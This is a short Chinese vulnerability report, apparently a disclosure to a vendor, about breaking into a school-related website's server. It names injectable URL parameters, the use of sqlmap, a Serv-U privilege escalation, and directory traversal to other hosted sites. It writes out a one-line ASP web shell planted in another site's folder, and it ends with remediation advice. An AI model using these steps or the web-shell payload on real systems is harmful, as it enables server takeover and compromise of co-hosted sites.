?c=3
?result=school&d=157
厂商还是全部代码都查查吧,全局过滤一下。
sqlmap跑出了密码:
后台的安全是在是不可以恭维啊。
什么都不过滤。。。
shell的权限挺小的,这个目录不支持aspx,本盘不能跨目录。
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\目录下读取到了支持aspx的目录
读取C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\f6ef54bd\de1a25fb\App_Web_8tlihkqz.0.cs文件发现还有aspx的站在服务器上。
跨不过去,翻了下43598端口开了,用servu的提权脚本执行:
whoami >I:\tpwebroot\download\2.txt发现servu被降权了,是user权限,涛涛电脑知识网,不过权限也很高了,试着一下dir I:\ >I:\tpwebroot\download\3.txt,列出目录了,有读取权限,一层一层读下去,找到了其他网站的路径,直接
echo ^<%execute^(request^("#"^)^)%^> >I:\mobileMVC\test.asp搞到了,同理还有。。。后面就不继续了,www.xuhantao.com,希望厂商还是控制下目录权限吧,好多个应用放到一个站。
修复方案:
主站的注入彻底修复下吧,servu的那个权限修改下,目录的权限也修改下吧。
